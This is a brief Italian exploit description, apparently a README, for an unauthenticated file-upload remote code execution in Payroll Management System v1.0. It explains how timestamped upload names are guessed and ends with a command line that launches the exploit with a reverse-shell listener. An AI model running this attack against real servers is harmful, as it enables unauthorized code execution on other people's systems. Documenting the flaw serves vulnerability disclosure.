
Exploit di esecuzione remota di codice non autenticato per Payroll Management System v1.0 tramite upload di file dannosi, con previsione del nome del file e capacità di reverse shell.

RCE tramite upload di file per https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html. I nomi dei file hanno un timestamp preposto con accuratezza al minuto. Lo script cerca di indovinare il nome del file usando il timestamp del minuto corrente, precedente e successivo.
Payroll Management System v1.0 permette agli utenti di caricare immagini tramite la pagina "save_settings". Un attaccante non autenticato può sfruttare questa funzionalità per caricare invece un file PHP malevolo. I file caricati vengono archiviati in una cartella pubblicamente accessibile e hanno un timestamp con precisione al minuto aggiunto ai loro nomi, che può essere facilmente calcolato. Lo sfruttamento riuscito di questa vulnerabilità consente di eseguire codice arbitrario come l'utente che esegue il server web.
python3 exploit.py -rhost somewebsite.com -rport 443 -lhost 192.168.22.23 -lport 443 -https
